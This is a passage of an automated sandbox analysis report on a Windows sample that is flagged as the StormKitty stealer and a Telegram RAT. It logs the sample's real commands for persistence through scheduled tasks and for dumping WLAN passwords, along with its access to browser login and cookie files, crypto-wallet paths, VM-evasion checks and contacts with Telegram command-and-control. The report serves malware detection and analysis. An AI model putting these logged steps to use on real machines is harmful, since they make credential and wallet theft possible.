Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -596436s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -596232s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -596124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -596013s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595905s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595783s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595654s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595545s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595433s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595326s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595217s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595107s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -595001s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594855s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594745s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594631s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594508s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594399s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594280s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594171s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -594060s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -593952s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -593843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -593733s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe TID: 7436 Thread sleep time: -593624s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe TID: 7396 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe TID: 7868 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599751 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599619 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599460 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599356 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599247 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 599128 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598988 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598655 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598546 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598435 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598327 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598215 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 598106 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597997 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597870 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597746 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597561 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597449 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597343 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597233 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597124 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 597008 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596906 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596768 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596608 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596436 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596232 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596124 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 596013 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595783 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595654 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595545 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595433 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595326 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595217 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595107 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 595001 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594855 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594745 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594631 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594508 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594399 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594280 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594171 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 594060 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593952 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593843 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593733 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Thread delayed: delay time: 593624 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2102395683.00000256F39D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\f
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: HTZ4az17lj.exe, 00000000.00000002.2143247050.00000295F70D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: uuhbr0xg.h20.exe, 0000000B.00000002.2102395683.00000256F39D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWV
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp90AB.tmp.dat.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe /sc minute /mo 5 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe TaskKill /F /IM 6044
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe Timeout /T 2 /Nobreak
Uses taskkill to terminate processes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe TaskKill /F /IM 6044
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the product ID of Windows
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Queries volume information: C:\Users\user\Desktop\HTZ4az17lj.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Queries volume information: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
AV process strings found (often used to terminate AV products)
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tcpview.exe
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: lordpe.exe
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: autoruns.exe
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ollydbg.exe
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: regmon.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected StormKitty Stealer
Source: Yara match File source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HTZ4az17lj.exe PID: 6044, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HTZ4az17lj.exe PID: 6044, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jaxx5
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets
Source: HTZ4az17lj.exe, 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HTZ4az17lj.exe PID: 6044, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected StormKitty Stealer
Source: Yara match File source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HTZ4az17lj.exe PID: 6044, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HTZ4az17lj.exe PID: 6044, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426719 Sample: HTZ4az17lj.exe Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 58 api.telegram.org 2->58 60 229.116.3.0.in-addr.arpa 2->60 62 2 other IPs or domains 2->62 76 Multi AV Scanner detection for domain / URL 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 84 8 other signatures 2->84 8 HTZ4az17lj.exe 14 192 2->8         started        13 uuhbr0xg.h20.exe 14 5 2->13         started        signatures3 82 Uses the Telegram API (likely for C&C communication) 58->82 process4 dnsIp5 68 api.telegram.org 149.154.167.220, 443, 49718 TELEGRAMRU United Kingdom 8->68 70 128.199.113.162, 49704, 49712, 80 DIGITALOCEAN-ASNUS United Kingdom 8->70 72 2 other IPs or domains 8->72 50 C:\Users\user\AppData\...\uuhbr0xg.h20.exe, PE32+ 8->50 dropped 52 C:\Users\user\AppData\...\ZGGKNSUKOP.jpg, ASCII 8->52 dropped 54 C:\Users\user\AppData\...\SQSJKEBWDT.docx, ASCII 8->54 dropped 56 3 other malicious files 8->56 dropped 86 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->86 88 Found many strings related to Crypto-Wallets (likely being stolen) 8->88 90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->90 98 4 other signatures 8->98 15 cmd.exe 8->15         started        18 chrome.exe 9 8->18         started        21 cmd.exe 8->21         started        29 4 other processes 8->29 92 Antivirus detection for dropped file 13->92 94 Multi AV Scanner detection for dropped file 13->94 96 Machine Learning detection for dropped file 13->96 23 schtasks.exe 13->23         started        25 chrome.exe 13->25         started        27 schtasks.exe 13->27         started        file6 signatures7 process8 dnsIp9 100 Uses netsh to modify the Windows network and firewall settings 15->100 102 Tries to harvest and steal WLAN passwords 15->102 44 4 other processes 15->44 64 192.168.2.5, 443, 49703, 49704 unknown unknown 18->64 66 239.255.255.250 unknown Reserved 18->66 31 chrome.exe 18->31         started        46 4 other processes 21->46 34 conhost.exe 23->34         started        36 chrome.exe 25->36         started        38 conhost.exe 27->38         started        40 conhost.exe 29->40         started        42 conhost.exe 29->42         started        48 4 other processes 29->48 signatures10 process11 dnsIp12 74 www.google.com 142.250.105.99, 443, 49714, 49729 GOOGLEUS United States 31->74
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.44.66
 api.mylnikov.org United States
13335 CLOUDFLARENETUS false
142.250.105.99
 www.google.com United States
15169 GOOGLEUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
128.199.113.162
 unknown United Kingdom
14061 DIGITALOCEAN-ASNUS false
239.255.255.250
 unknown Reserved
unknown unknown false
104.16.185.241
 icanhazip.com United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.5

Contacted Domains

Name IP Active
www.google.com 142.250.105.99 true
api.mylnikov.org 104.21.44.66 true
api.telegram.org 149.154.167.220 true
icanhazip.com 104.16.185.241 true
229.116.3.0.in-addr.arpa unknown unknown

